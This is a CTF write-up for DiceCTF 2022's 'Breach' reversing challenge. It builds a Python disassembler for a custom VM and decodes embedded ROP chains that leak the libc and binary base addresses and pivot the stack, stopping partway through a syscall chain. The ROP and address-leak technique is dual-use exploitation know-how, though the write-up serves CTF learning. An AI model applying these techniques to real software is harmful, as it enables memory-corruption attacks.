DiceCTF 2022 : Breach Writeup
tl;dr:
- Breach (re) script: solve.py
- Containment (pwn) script: exploit.py
Unfortunately during the CTF I didn’t manage to solve the challenge, however got very far and finished solving it the day after the challenge had closed.
Examining the package
Inside the zip file there is an ‘out’ folder which contains all the relevant files
-
breach
- The executable -
breach.bin
- The VM byte code (discussed later) -
Dockerfile
- A Dockerfile to establish an environment to run -
build.sh
- A script to build the docker image -
run.sh
- A script to run the built docker image
Looking at the docker file we can see the following
FROM ubuntu:20.04
COPY breach /app/breach
COPY breach.bin /app/breach.bin
RUN echo "PWN_FLAG" > /app/flag.txt
CMD /app/breach /app/breach.bin
From this we can determine that breach
will run with the breach.bin
specified as an argument and additionally there is a flag.txt
which will be stored next to the application.
Looking at the breach binary
Let’s open up the breach
binary in Ghidra to better analyze what it’s doing when it gets run
The first thing to do is finding the main
function which is often done by looking at the entry
point and finding the call to __libc_start_main
the first argument passed to this function is main
void entry(undefined8 param_1,undefined8 param_2,undefined8 param_3)
{
undefined8 in_stack_00000000;
undefined auStack8 [8];
__libc_start_main(FUN_00101229,in_stack_00000000,&stack0x00000008,FUN_00101960,FUN_001019d0,
param_3,auStack8);
do {
/* WARNING: Do nothing block with infinite loop */
} while( true );
}
Now that we know FUN_00101229
is main
let’s take a look at it and change the name and signature of the function to have the correct arguments as it’s fairly well known, and start looking at it
__stream = fopen(argv[1],"rb");
fseek(__stream,0,2);
__size = ftell(__stream);
fseek(__stream,0,0);
DAT_001140e0 = malloc(__size);
fread(DAT_001140e0,1,__size,__stream);
From this code we can see that the byte code file gets read into DAT_001140e0
so I’ll rename it appropriately to bytecode
(rom
is another alternative to be considered) to better indicate that it contains the bytecode.
lVar3 = DAT_00104040;
while (DAT_00104040 = lVar3, DAT_00104048 == '\0') {
bVar4 = *(byte *)(DAT_00104040 + (long)bytecode) & 0xf;
switch(bVar4) {
case 0:
DAT_00104048 = '\x01';
lVar3 = DAT_00104040 + 1;
break;
...
default:
printf("Unknown instruction: %d\n",(ulong)bVar4);
/* WARNING: Subroutine does not return */
exit(-1);
}
}
From this code we can determine that lVar3
and DAT_00104040
both seem to indicate some sort of offset in the byte code to an instruction so let’s rename them to inst_offset
and inst_offset
, they are likely independent variables because one is the value in a register and the other is the value in memory.
Looking at bVar
it looks to be using the lower 4 bytes (nibble) of the byte code as the instruction, so let’s rename it to instruction
and also let’s give a type to bytecode
as a byte*
so the code becomes a little easier to read.
The while loop appears to continue until DAT_00104048
gets set to 1
so let’s rename this to should_halt
and make it a bool
variable as it looks like it only stores 0
and 1
.
The next bit of useful information can be seen in the handling of instruction 10
case 10:
printf("r%d = 0x%lx\n",(ulong)(bytecode[inst_offset + 1] & 0xf),
*(undefined8 *)
(&DAT_00114060 + (long)(int)(uint)(bytecode[inst_offset + 1] & 0xf) * 8));
inst_offet2 = inst_offset + 2;
From this and a bit of knowledge about VMs we can determine that there is likely registers in this VM implementation which are called (r0
- r15
– 15 is the max because of the nibble) they get stored in the DAT_00114060
variable which is an array of long
’s meaning that these are 64-bit registers so let’s change DAT_00114060
to be an array of long[16]
and give it the name registers
.
Looking through the rest of the instructions the other bit of data that is missing and unnamed is DAT_00104060
so let’s take a look at the usages of it within the VM instruction loop.
case 4:
*(long *)(&DAT_00104060 + registers[(int)(uint)(bytecode[inst_offset + 1] & 0xf)]) =
registers[(int)(uint)(bytecode[inst_offset + 1] >> 4)];
inst_offet2 = inst_offset + 2;
break;
case 5:
registers[(int)(uint)(bytecode[inst_offset + 1] >> 4)] =
*(long *)(&DAT_00104060 + registers[(int)(uint)(bytecode[inst_offset + 1] & 0xf)]);
inst_offet2 = inst_offset + 2;
break;
So it looks like there are two instructions which use this data instruction 4
which stores into the memory at the address of one register from the value of another register and instruction 5
which does the opposite of loading from this memory, while they both appear to be writing long
’s the offset’s appear to be in bytes, this is likely the memory for the VM to work with so let’s rename DAT_00104060
to mem
and turn it into a byte
array as this is completely unbounded in checks we can’t determine the size so I just use the maximum Ghidra suggests before it overwrites the next symbol (the registers) which is 65536
(0x10000
).
I won’t bore you with going into every individual instruction now that we have established the core parts of the VM (some VMs also have an inbuilt stack but this one doesn’t appear to), here is a summary of all the instructions and the operands.
Opcode | Instruction | Notes |
---|---|---|
0 | halt |
Stop the VM |
1 | mov src, imm |
imm is an 8-byte immediate value |
2 | mov dst, src |
|
3 | aluop dst, src |
aluop is based on the other nibble in the instruction and can be + ,- ,* ,% ,& ,| ,^ and >>
|
4 | mov mem[dst], src |
This is an 8-byte read |
5 | mov dst, mem[src] |
This is an 8-byte read |
6 | mov dst, rom[src] |
This is an 8-byte read, I use rom here instead of bytecode as no other opcode changes these |
7 | jmp imm |
|
8 | jmp reg |
|
9 | jeq reg1, reg2, imm |
If reg1 and reg2 are both equal then it will jump to imm
|
10 | print reg |
This will print the register |
Now that we know all the instructions you might notice something, when we execute the program it appears to print Flag:
and takes input from the user, but none of these instructions appear to do anything related to this.
Writing a disassembler
Now that we know the instructions, it’s time to start writing something to disassemble the binary, there are few things which we might want to look out for when writing this disassembler
- Not all of the bytes might be instructions
- The instruction size isn’t fixed so we can’t assume we can start at a random place, we need a known start place (we know atleast 0 is an instruction)
- Instructions might have data or intentionally illegal instructions interleaved to make disassembling harder
- The instructions might get modified at runtime using things like the
mov mem[dst], src
instruction asdst
is completely unbounded
While these are all things to be aware of and watch out for I often find it’s best to start with the simpliest implementation first of just assume everything is an instruction from the beginning of the file to the end and hope we get lucky.
I’m going to make use of python for doing this so the first thing I’ll is establish some types for the instructions, this will make it easier if I want to do matching on them later
Halt = namedtuple('Halt',['addr'])
MovImm = namedtuple('MovImm',['addr','reg','imm'])
MovReg = namedtuple('MovReg',['addr','dst','src'])
Mov = namedtuple('Mov',['addr','dst','src'])
Add = namedtuple('Add',['addr','dst','src'])
Sub = namedtuple('Sub',['addr','dst','src'])
Mul = namedtuple('Mul',['addr','dst','src'])
Mod = namedtuple('Mod',['addr','dst','src'])
And = namedtuple('And',['addr','dst','src'])
Or = namedtuple('Or', ['addr','dst','src'])
Xor = namedtuple('Xor',['addr','dst','src'])
Shr = namedtuple('Shr',['addr','dst','src'])
alu_ops = (Add,Sub,Mul,Mod,And,Or,Xor,Shr)
MemLoad = namedtuple('MemLoad', ['addr','dst','src'])
MemStore = namedtuple('MemStore', ['addr','dst','src'])
RomLoad = namedtuple('RomLoad', ['addr','dst', 'src'])
Jump = namedtuple('Jump', ['addr','target'])
JumpReg = namedtuple('JumpReg', ['addr','reg'])
JumpEq = namedtuple('JumpEq', ['addr','target','lhs','rhs'])
PrintReg = namedtuple('Print', ['addr','reg'])
Now that we have the instructions we need to parse the opcodes to turn them into these types
NOTE: I’m using the new match
functionality in Python 3.10 fairly heavily in the solution to this CTF Challenge, as I wanted to try it, and now that I have I don’t think I can live without it (hopefully once seeing how helpful it is you feel the same).
def parse(buffer):
instructions = []
offset = 0
while offset < len(buffer):
opcode = buffer[offset] & 0xf
match opcode:
case 0:
instructions.append(Halt(offset))
offset += 1
case 1:
reg = buffer[offset] >> 4
imm = u64(buffer[offset+1:offset+9])
instructions.append(MovImm(offset, reg, imm))
offset += 9
case 2:
reg1 = buffer[offset+1] & 0xf
reg2 = buffer[offset+1] >> 4
instructions.append(MovReg(offset, reg1, reg2))
offset += 2
case 3:
aluop = buffer[offset] >> 4
reg1 = buffer[offset+1] & 0xf
reg2 = buffer[offset+1] >> 4
Op = alu_ops[aluop]
instructions.append(Op(offset, reg1, reg2))
offset += 2
case 4:
reg1 = buffer[offset+1] & 0xf
reg2 = buffer[offset+1] >> 4
instructions.append(MemStore(offset, reg1, reg2))
offset += 2
case 5:
reg1 = buffer[offset+1] & 0xf
reg2 = buffer[offset+1] >> 4
instructions.append(MemLoad(offset, reg2, reg1))
offset += 2
case 6:
reg1 = buffer[offset+1] & 0xf
reg2 = buffer[offset+1] >> 4
instructions.append(RomLoad(offset, reg2, reg1))
offset += 2
case 7:
target = u64(buffer[offset+1:offset+9])
instructions.append(Jump(offset, target))
offset += 9
case 8:
reg = buffer[offset] >> 4
instructions.append(JumpReg(offset, reg))
offset += 1
case 9:
reg1 = buffer[offset+1] & 0xf
reg2 = buffer[offset+1] >> 4
target = u64(buffer[offset+2:offset+10])
instructions.append(JumpEq(offset, target, reg1, reg2))
offset += 10
case 10:
other = buffer[offset+1] & 0xf
instructions.append(PrintReg(offset, other))
offset += 2
case _:
print(f'Unknown instruction {opcode:x} @ 0x{offset:x}', file=sys.stderr)
break
return instructions
We also need something to now dump those instructions, while we could rely on python’s repr
it’s not as intuitive to read (atleast for someone more familair with looking at typical (dis)assembler output)
def dump(instructions):
for opcode in instructions:
print(f'{opcode.addr:04x} ', end='')
match opcode:
case Halt(addr):
print('\thalt')
case MovImm(addr, reg, imm):
print(f'\tmov r{reg}, 0x{imm:x}')
case MovReg(addr, reg1, reg2):
print(f'\tmov r{reg1}, r{reg2}')
case Add(addr, reg1, reg2) | Sub(addr, reg1, reg2) | Mul(addr, reg1, reg2) | Mod(addr, reg1, reg2) | \
And(addr, reg1, reg2) | Or(addr, reg1, reg2) | Xor(addr, reg1, reg2) | Shr(addr, reg1, reg2):
op_index = alu_ops.index(type(opcode))
alu_op = ('add','sub','mul','mod','and','or','xor', 'shr')[op_index]
print(f'\t{alu_op} r{reg1}, r{reg2}')
case MemStore(addr, reg1, reg2):
print(f'\tstore mem[r{reg1}], r{reg2}')
case MemLoad(addr, reg1, reg2):
print(f'\tmov r{reg1}, mem[r{reg2}]')
case RomLoad(addr, reg1, reg2):
print(f'\tmov r{reg1}, rom[r{reg2}]')
case Jump(addr, target):
print(f'\tjump 0x{target:x}')
print()
case JumpReg(addr, reg):
print(f'\tjump r{reg}')
print()
case JumpEq(addr, target, reg1, reg2):
print(f'\tjumpeq r{reg1}, r{reg2}, 0x{target:x}')
print()
case PrintReg(addr, reg):
print(f'\tprintreg r{reg}')
case _:
print(f'Unknown instruction {opcode}', file=sys.stderr)
exit()
You’ll notice that I include extra lines after anything that jumps this is to make it more easy to see where the instruction pointer might not keep going.
Finally we have a main function
def main():
buffer = open(sys.argv[1], 'rb').read()
instructions = parse(buffer)
dump(instructions)
main()
Now if we run this what do we get
$ .\disassemble.py breach.bin >output.asm
Unknown instruction e @ 0x2809
Damn, we couldn’t get through the whole file but we managed to get to 0x2809 which is a lot considering that for each instruction if it was over 10 for the opcode it would have failed, doing a quick pass over the file it looks like most of it looks like sensile bytecode you would expect to see, except for a few things:
- The instructions at the end from
0x27f3
onwards don’t look right (maye this is the start of some data) - The giant block of
printreg
’s seem pretty strange, we haven’t seen any output of these, maybe they happen when we get the right flag answer
So for now let’s do some changes to just turn from 0x27f3
onwards into data bytes in the disassembly output, it could include bytecodes but it’s also a fairly known pattern for a VM (and non-VM) to have code at the start then data at the end of the file.
The other thing we can do is look at this a hexdump we might see a bit of a change in pattern between the instructions and the suspected data.
000027b0 03 0f 18 a1 a8 7f 00 00 00 00 00 00 02 20 11 5a |............. .Z|
000027c0 2b 03 00 00 00 00 00 03 10 04 0a 01 08 00 00 00 |+...............|
000027d0 00 00 00 00 03 0a 02 3b 01 60 c0 00 00 00 00 00 |.......;.`......|
000027e0 00 03 0b 04 ba 05 1f 01 08 00 00 00 00 00 00 00 |................|
000027f0 03 0f 18 14 cc 67 65 47 61 6e 53 7f 70 63 65 47 |.....geGanS.pceG|
^^ 0x27f3 start
00002800 61 6e 31 36 02 61 65 47 61 6e 53 0c 29 63 65 47 |an16.aeGanS.)ceG|
00002810 61 6e 31 66 91 6a 65 47 61 6e 53 44 69 63 65 47 |an1f.jeGanSDiceG|
00002820 61 6e 67 12 c9 68 65 47 61 6e 53 36 02 61 65 47 |ang..heGanS6.aeG|
Looking at this, it seems like a fairly nice cut for data and instructions, in-fact if you search the disassembly output for 0x27f3
you’ll see things mentioning that same address.
So let’s go with a very naive implementation of dumping data from that address onwards.
def dump_data(start_of_data, data):
printable = bytes(string.printable, 'ascii')
for data_offset, byte in enumerate(data, start_of_data):
print(f'{data_offset:04x} ', end='')
if byte in printable:
print(f'\t.db 0x{byte:x} ; {chr(byte)}')
else:
print(f'\t.db 0x{byte:x}')
def main():
buffer = open(sys.argv[1], 'rb').read()
start_of_data = 0x27f3
instructions = parse(buffer[:start_of_data])
dump(instructions)
dump_data(start_of_data, buffer[start_of_data:])
Now let’s see how that output looks towards the end of the file.
27e5 mov r1, mem[r15]
27e7 mov r0, 0x8
27f0 add r15, r0
27f2 jump r1
27f3 .db 0x14
27f4 .db 0xcc
27f5 .db 0x67 ; g
27f6 .db 0x65 ; e
27f7 .db 0x47 ; G
Adding some labels
Starting to look a lot nicer, we now have something fairly smooth to work with, let’s establish some labels to make things a little nicer to read.
def find_labels(instructions, start_of_data, end_of_data):
labels = {}
for opcode in instructions:
match opcode:
case Jump(target=target):
labels[target] = f'LAB_{target:x}'
case JumpEq(target=target):
labels[target] = f'LAB_{target:x}'
case MovImm(imm=imm) if imm >= start_of_data and imm < end_of_data:
labels[imm] = f'DAT_{imm:x}'
return labels
Now we need to include them in our output
def dump(instructions, labels):
for opcode in instructions:
if opcode.addr in labels:
print(f'{labels[opcode.addr]}:')
#print(f'{opcode.addr:04x} ', end='')
match opcode:
...
case MovImm(addr, reg, imm):
if imm in labels:
print(f'\tmov r{reg}, {labels[imm]} ; 0x{imm:x}')
else:
print(f'\tmov r{reg}, 0x{imm:x}')
...
case Jump(addr, target):
print(f'\tjump {labels[target]}')
print()
...
case JumpEq(addr, target, reg1, reg2):
print(f'\tjumpeq r{reg1}, r{reg2}, {labels[target]}')
print()
...
def dump_data(start_of_data, data, labels):
printable = bytes(string.printable, 'ascii')
for data_offset, byte in enumerate(data, start_of_data):
if data_offset in labels:
print(f'{labels[data_offset]}:')
#print(f'{data_offset:04x} ', end='')
...
Now things are really starting to look nice to read and work with
LAB_2054:
mov r8, DAT_2c0f ; 0x2c0f
mov r9, 0x2c18
mov r0, 0x8
sub r15, r0
mov r0, LAB_2085 ; 0x2085
store mem[r15], r0
jump LAB_2463
Also doing a quick santiy check of all things within the data section to ensure there is no LAB
or FUNC
label’s meaning we have potential byte code inside where we’ve assumed it’s only data, we don’t so this is a good thing, it’s reinforcing the earlier assumption.
Finding the stack pointer
Now if your looking around the code enough you’ll start to spot a few patterns, the easy one to spot is what appears to be a stack happening with what register r15
points to (starts at 0x10000
right at the start)
Doing a bit of a search of the disassembler output for r15
appears to reiterate this with the common patterns being
Push immediate | Push register | Pop |
---|---|---|
mov r0, 0x8 sub r15, r0 mov r0, 0x28 store mem[r15], r0 |
mov r0, 0x8 sub r15, r0 store mem[r15], r11 |
mov r1, mem[r15] mov r0, 0x8 add r15, r0 |
You might also notice that these also often get combined with a jump
instruction we probably means they are a call
/ret
pair, let’s add some artifical instructions so we can remove this noise and make it easier to read, we’ll start with handling the push
and pop
# Artifical instructions
PushImm = namedtuple('PushImm', ['addr', 'imm'])
PushReg = namedtuple('PushReg', ['addr', 'reg'])
Pop = namedtuple('Pop', ['addr', 'reg'])
def dump(instructions, labels):
for opcode in instructions:
....
match opcode:
....
## Artifical instructions
case PushImm(addr, imm):
if imm in labels:
print(f'\tpush {labels[imm]} ; 0x{imm:x}')
else:
print(f'\tpush 0x{imm:x}')
case PushReg(addr, reg):
print(f'\tpush r{reg}')
case Pop(addr, reg):
print(f'\tpop r{reg}')
case _:
...
Now we build a matcher to do a pass and create these instructions
def pass_push_pop_inst(instructions):
idx = 0
while idx < len(instructions):
match instructions[idx:]:
case [MovImm(addr=addr, reg=0, imm=8), Sub(dst=15, src=0), MovImm(reg=0, imm=imm), MemStore(dst=15, src=0), *_]:
instructions[idx:idx+4] = (PushImm(addr, imm),)
case [MovImm(addr=addr, reg=0, imm=8), Sub(dst=15, src=0), MemStore(dst=15, src=src), *_]:
instructions[idx:idx+3] = (PushReg(addr, src),)
case [MemLoad(addr, dst=dst, src=15), MovImm(reg=0, imm=8), Add(dst=15, src=0), *_]:
instructions[idx:idx+3] = (Pop(addr, dst),)
idx += 1
def main():
...
instructions = parse(buffer[:start_of_data])
pass_push_pop_inst(instructions)
...
NOTE: Doing these passes which consolidate instructions the intermediate registers (e.g. r0
) are also changed so if your reading the assembly output you also need to assume the have changed r0
too (looking at the output r0
seems to be a random temporary register which always gets changed)
Now that we have this it starts to look a lot nicer
push LAB_59 ; 0x59
jump LAB_2353
LAB_59:
push 0x78
jump LAB_2584
pop r1
jump r1
Adding call/ret artifical instructions
Now let’s build a pass which will create some Call
and Ret
instructions to make these even better.
Call = namedtuple('Call', ['addr', 'target'])
Ret = namedtuple('Ret', ['addr'])
def dump(instructions, labels):
...
case Call(addr, target):
print(f'\tcall {labels[target]}')
print()
case Ret(addr):
print(f'\tret')
print()
As the Jump
is about to change with these we need to also add Call
to the find_labels
def find_labels(instructions, start_of_data, end_of_data):
labels = {}
for opcode in instructions:
match opcode:
...
case Call(target=target):
labels[target] = f'FUNC_{target:x}'
return labels
Then we finally we build a pass which goes over it
def pass_call_ret_inst(instructions):
idx = 0
while idx < len(instructions):
match instructions[idx:]:
case [PushImm(addr, imm), Jump(target=target), *_] if imm == instructions[idx+2].addr:
instructions[idx:idx+2] = (Call(addr, target),)
case [Pop(addr=addr, reg=1), JumpReg(reg=1), *_]:
instructions[idx:idx+2] = (Ret(addr),)
idx += 1
This needs to run after the push
/pop
pass as it depends on it
pass_push_pop_inst(instructions)
pass_call_ret_inst(instructions)
Now let’s see how this compares
Original | With push/pop | With call/ret |
---|---|---|
mov r0, 0x8 sub r15, r0 mov r0, LAB_59 ; 0x59 store mem[r15], r0 jump LAB_2353 |
push LAB_59 ; 0x59 jump LAB_2353 |
call FUNC_2353 |
mov r1, mem[r15] mov r0, 0x8 add r15, r0 jump r1 |
pop r1 jump r1 |
ret |
See how much better it is? Did I tell you matchers in Python are awesome?
Understanding the disassembly
Now have the code in a much more easy to understand format, let’s start digging into the program and how it works.
From the entry point immediately after the stack get’s setup then FUNC_59
get’s called which right at the start calls FUNC_2584
, which is the first big juicy function that we’ll be looking at.
Here is the code for it, I’ve added the disassasmbly here and some comments
FUNC_2584:
// Get the stdin pointer by reading the address at mem[-0x30]
mov r2, 0x30
mov r3, 0x0
sub r3, r2
mov r2, mem[r3]
// Get the libc base address by subtracting 0x1eb980 from stdin (_IO_2_1_stdin_ in libc)
mov r0, 0x1eb980
sub r2, r0
// Get the address where the environ pointer (stack pointer) is stored by adding 0x1ef2e0 to the base
mov r0, 0x1ef2e0
mov r3, r2
add r3, r0
// Get the wide_pointer buffer pointer from memory allocated by the file pointer by looking at rom[-0x1150]
mov r0, 0x1150
mov r1, 0x0
sub r1, r0
mov r4, rom[r1]
// Get a pointer to the 'rom' calculated based on the wide_pointer
// This is an important pointer as now it can be used with any calcutions to get an absolute address relative to the rom
mov r0, 0x1100
add r4, r0
// Get the value stored in the 'environ' pointer (the stack abse pointer)
mov r0, r3
sub r0, r4
mov r5, rom[r0]
// Get the address of 'main' by reading from environ/stackbase-0xe8
mov r0, 0xe8
mov r6, r5
sub r6, r0
mov r0, r6
sub r0, r4
mov r6, rom[r0]
// Get the base address of 'breach' by subtracting the address of main (0x1229)
mov r0, 0x1229
sub r6, r0
// r7 = stackbase-0x108 (the pointer of return __libc_start_main from main)
mov r7, r5
mov r0, 0x108
sub r7, r0
// r3 = breach base address
// r4 = stack pointer for returning from `main`
mov r3, r6
mov r4, r7
call FUNC_276d
mov r4, 0x8000
mov r5, DAT_27f3 ; 0x27f3
call FUNC_2667
halt
ret
From this function we can tell that it’s calculated a bunch of offsets to get the base address of libc and breach along, this is likely initialization code now we have two final functions to look at within FUNC_2584
which are FUNC_276d
and FUNC_2667
then it finally halt
’s and returns, because it’s got addresses which could be used for building a ROP chain you might already suspect that halt
is going to be used to execute a ROP chain.
Let’s dig into FUNC_276d
now
// r2 = libc base address
// r3 = breach base address
// r4 = stack pointer for returning from 'main' (ROP pointer)
FUNC_276d:
// Get the address of the stack ROP pointer relative to 'mem' (base+0x4060)
mov r9, r4
sub r9, r3
mov r0, 0x4060
sub r9, r0
// Store the address of a 'pop rsp' gadget from libc in the return from main address
mov r0, r2
mov r1, 0x32b5a
add r0, r1
store mem[r9], r0
// Shift the address it was stored at by 8 (the next pointer)
mov r0, 0x8
add r9, r0
// Store a pointer to &mem[0x8000] (exe base + 0xc060)
mov r10, r3
mov r0, 0xc060
add r10, r0
store mem[r9], r10
ret
Overall this function modifies the stack where the return from main
occurs and changes it so that it does the ROP pop rsp; exe+0xc060
meaning that the stack pointer will now be pointing to mem[0x8000]
, this likely allows more easy building of ROP chains as it’s just a write to mem
without doing these same offset calculations.
Now let’s look at FUNC_2667
, it’s a bit more of a monster (it also get’s called in a few places so gives us more benefits then the other two we just looked at which just get called once)
// r2 = libc base address
// r3 = breach base address
// r4 = Some destination memory location
// r5 = Some source data address
FUNC_2667:
// self explainitory -- we pop this before the ret also
push r6
push r7
LAB_2681:
// Read from the source address and xor the value by 0x676e614765636944
mov r0, rom[r5]
mov r1, 0x676e614765636944
xor r0, r1
// If the value is equal to 0xdeadbeefdeadbeef then return (exit loop)
mov r1, 0xdeadbeefdeadbeef
jumpeq r0, r1, LAB_2745
// r6 = The lower 7 bytes of the value (0x00ffffffffffffff)
// r7 = The higher byte of the value (0xff00000000000000)
mov r6, r0
mov r7, r0
mov r0, 0xffffffffffffff
and r6, r0
mov r0, 0x38
shr r7, r0
// If the higher byte is 0 then goto LAB_26fd
mov r0, 0x0
jumpeq r7, r0, LAB_26fd
// If the higher byte is 0x34 then goto LAB_2708
mov r0, 0x34
jumpeq r7, r0, LAB_2708
// If the higher byte is 0x56 then goto LAB_2717
mov r0, 0x56
jumpeq r7, r0, LAB_2717
// else continue looping
jump LAB_2726
LAB_26fd:
// Store the value (lower 7 bytes) in r4
store mem[r4], r6
jump LAB_2726
LAB_2708:
// Store (value+libc base) in r4
mov r0, r2
add r0, r6
store mem[r4], r0
jump LAB_2726
LAB_2717:
// Store (value+exe base) in r4
mov r0, r3
add r0, r6
store mem[r4], r0
jump LAB_2726
LAB_2726:
// Increment r5 and r4 to keep moving down the array
mov r0, 0x8
add r5, r0
mov r0, 0x8
add r4, r0
jump LAB_2681
LAB_2745:
pop r7
pop r6
ret
This function is a bit of a magic copy function it copies data from rom+r5
into mem+r5
until it hits an end marker and depending on the data will either convert it into something which is relative to the libc or the executable’s base address. (A nice handy tool for storing ROP chains)
So looking back at the end of FUNC_2584
we can add some more comments
FUNC_2584:
...
// Setup ROP for moving stack to &mem[0x8000]
mov r3, r6
mov r4, r7
call FUNC_276d
// Copy a rop chain DAT_27f3 into &mem[0x8000]
mov r4, 0x8000
mov r5, DAT_27f3 ; 0x27f3
call FUNC_2667
halt
ret
Unfortunately if we look at DAT_27f3
it isn’t very useful to understand
DAT_27f3:
.db 0x14
.db 0xcc
.db 0x67 ; g
.db 0x65 ; e
.db 0x47 ; G
.db 0x61 ; a
.db 0x6e ; n
...
Now let’s modify the disassembler so that we can more easily determine what these ROP chains.
Adding ROP chain dumping to the disassembler
The first thing we need to do is identify what blocks might be magic copies, to this we will just look for things which call FUNC_2667
and extract the r5
value
def identify_magic_blocks(instructions):
total_instructions = len(instructions)
idx = 0
magic_blocks = []
while idx < len(instructions):
# Limit to 3 to avoid picking up unexpected instructions in the middle
match instructions[idx:idx+3]:
case [*_, MovImm(reg=5, imm=imm), Call(target=0x2667)] | \
[MovImm(reg=5, imm=imm), *_, Call(target=0x2667)]:
magic_blocks.append(imm)
idx += 1
return magic_blocks
Now we need to rework our dump_data
to work with these new magic dumps
def dump_data(start_of_data, data, labels, magic_blocks):
printable = bytes(string.printable, 'ascii')
offset = 0
while offset < len(data):
byte = data[offset]
data_offset = start_of_data + offset
if data_offset in labels:
print()
print(f'{labels[data_offset]}:')
#print(f'{data_offset:04x} ', end='')
if data_offset in magic_blocks:
start_of_magic = offset
while True:
sub_data = data[offset:offset+8]
val = u64(sub_data)
offset += 8
val ^= 0x676e614765636944
if val == 0xdeadbeefdeadbeef:
print('\t.magicend')
break
key = val >> 0x38
val = val & 0xffffffffffffff
if key == 0:
print(f'\t.mraw 0x{val:x}')
elif key == 0x34:
print(f'\t.mlibc 0x{val:x}')
elif key == 0x56:
print(f'\t.mexe 0x{val:x}')
else:
print(f'\t.munchanged ; offset 0x{(offset - 8 - start_of_magic):x}')
else:
if byte in printable:
print(f'\t.db 0x{byte:x} ; {chr(byte)}')
else:
print(f'\t.db 0x{byte:x}')
offset += 1
Which gives us a nice output now showing which things are from libc and from the executable
DAT_27f3:
.mlibc 0x4a550
.mexe 0x193b
.mlibc 0x26b72
.mexe 0x4048
.mlibc 0x9f822
.mraw 0x0
...
.mexe 0xc060
.magicend
It looks like we only have one lot of data resolved using this, so let’s look at the calls to FUNC_2667
a little more and it looks like we have covered the calls which use DAT_27f3
however FUNC_2504
which uses the r4
argument as the source is not covered, so let’s modify the discovery algorithm for magic copy’s to include it as a source.
def identify_magic_blocks(instructions):
...
case [*_, MovImm(reg=4, imm=imm), Call(target=0x2504)]:
magic_blocks.append(imm)
Getting ROP gadget instructions
But you know what would be nice? Knowing what these gadgets are, I’ll just be grabbing the libc one’s for this, if your doing this yourself feel free to do the same for the executable but I found they weren’t necessary.
So in order to this we need a way to lookup the gadget at the specified address, I could do this at runtime using pwntools’s ROP
and raw
however I pick a slightly more efficient and use ROPgadget
to dump all gadgets then find them when I need them, so first let’s dump the gadgets
ROPgadget --all --binary libc-2.31.so > libc-rops.txt
And we can look them up in python
def get_libc_rop(addr):
addr_as_str = f'0x{addr:016x}'
# Built with: ROPgadget --all --binary breach > libc-rops.txt
with open('libc-rops.txt') as rop_file:
for line in rop_file:
if line.startswith(addr_as_str):
return line[len(addr_as_str)+3:].strip()
return ''
Then finally we call this function when output .mlibc
def dump_data(start_of_data, data, labels, magic_blocks):
...
elif key == 0x34:
print(f'\t.mlibc 0x{val:x} ; {get_libc_rop(val)}')
Now these dumps look much better to understand the ROP chains
DAT_299b:
.mlibc 0x162866 ; pop rdx ; pop rbx ; ret
.munchanged ; offset 0x8
.munchanged ; offset 0x10
.mlibc 0x26b72 ; pop rdi ; ret
.munchanged ; offset 0x20
.mlibc 0x4514d ; mov qword ptr [rdi], rdx ; ret
.magicend
Looking back at the initialization ROP
Let’s go back and look at that ROP which was setup prior to the first halt
expected to be after the stack first relocates to &mem[0x8000]
, I have added comments to make it easier to understand
DAT_27f3:
.mlibc 0x4a550 ; pop rax ; ret
.mexe 0x193b // continuation of instruction pointer loop
.mlibc 0x26b72 ; pop rdi ; ret
.mexe 0x4048 // The address of 'should_halt'
.mlibc 0x9f822 ; pop rcx ; ret
.mraw 0x0
// Set 'should_halt' to false
.mlibc 0xba056 ; mov qword ptr [rdi], rcx ; ret
.mlibc 0x26b72 ; pop rdi ; ret
.mexe 0xc060 // &mem[0x8000]
.mlibc 0x9f822 ; pop rcx ; ret
.mlibc 0x270b1 ; call rax
// Set mem[0x8000] to 'call rax; ret' gadget
// rax is continuation of the instruction pointer loop
.mlibc 0xba056 ; mov qword ptr [rdi], rcx ; ret
// Set the base pointer to &mem[0x7FA0]
.mlibc 0x256c0 ; pop rbp ; ret
.mexe 0xc000 // &mem[0x7FA0]
// Set the stack pointer to &mem[0x8000]
.mlibc 0x32b5a ; pop rsp ; ret
.mexe 0xc060 // &mem[0x8000]
.magicend
To simplify this it sets should_halt
back to false (remember this is after a halt
), and changes the stack so that it’s pointing to mem[0x8000]
and ready’s it to continue the loop, meaning this will just keep the loop going after the halt
.
If you look at FUNC_2504
you can see this actually get’s used with other ROP chains which likely do the actual work.
FUNC_2504:
mov r5, r4
mov r4, 0x8000
call FUNC_2667
mov r5, DAT_27f3 ; 0x27f3
call FUNC_2667
call FUNC_27b3
halt
ret
Register naming
Earlier we established that r15
was a stack pointer, and pretty much eliminated it completely aside from initialization.
However there are two other registers which appear to have a global meaning after initialization these are r2
which is the libc base address and r3
which is the executable base address, you can verify this by searching all the code for the usages of these registers and find they only ever get read after initialization.
So let’s rename these variables that we know to rexe
, rlibc
and rsp
which should make some of the disassembly even easier to read, without having to think about their hidden meaning.
reg_names = ('r0', 'r1', 'rlibc', 'rexe', 'r4', 'r5', 'r6', 'r7', 'r8',
'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'rsp')
I won’t show the entire change of the dump
function, this write-up is already way too long, but the general change is that outputs of registers now look like
print(f'\tmov {reg_names[reg1]}, {reg_names[reg2]}')
Now if we look at the result, you can see how easy it is to identify what’s an offset with the executable or libc
Before | After |
---|---|
mov r9, r3 mov r0, 0x6060 add r9, r0 |
mov r9, rexe mov r0, 0x6060 add r9, r0 |
Naming what was learnt so far
This is already turning into a fairly big project, so let’s update our labels with some names for existing functions and data that we know about
labels[0x2584] = 'init'
labels[0x276d] = 'init_set_stack'
labels[0x2667] = 'magic_copy'
labels[0x27f3] = 'ROP_continue_loop'
labels[0x2504] = 'execute_rop'
Finding the syscall
Let’s continue on from just after init
and you will see the following call
mov r8, 0x16
mov r9, rexe
mov r0, 0x6060
add r9, r0
call FUNC_2353
Let’s dig into FUNC_2353
(this get’s called 18 times so understanding it will solve a lot of things)
FUNC_2353:
mov r0, 0x8008
store mem[r0], r12
mov r0, 0x8018
store mem[r0], r13
mov r0, 0x8050
store mem[r0], r8
mov r0, 0x8060
store mem[r0], r9
mov r0, 0x8070
store mem[r0], r10
mov r0, 0x8080
store mem[r0], r11
mov r4, DAT_287b ; 0x287b
call execute_rop
ret
It looks like this uses the ROP DAT_287b
and fills a bunch of things with regiters r8
-r13
, remember execute_rop
stores the ROP at 0x8000
so these are offsets with DAT_287b
, so let’s take a look at this ROP
DAT_287b:
.mlibc 0x1056fd ; pop rdx ; pop rcx ; pop rbx ; ret
.munchanged ; offset 0x8 // r12
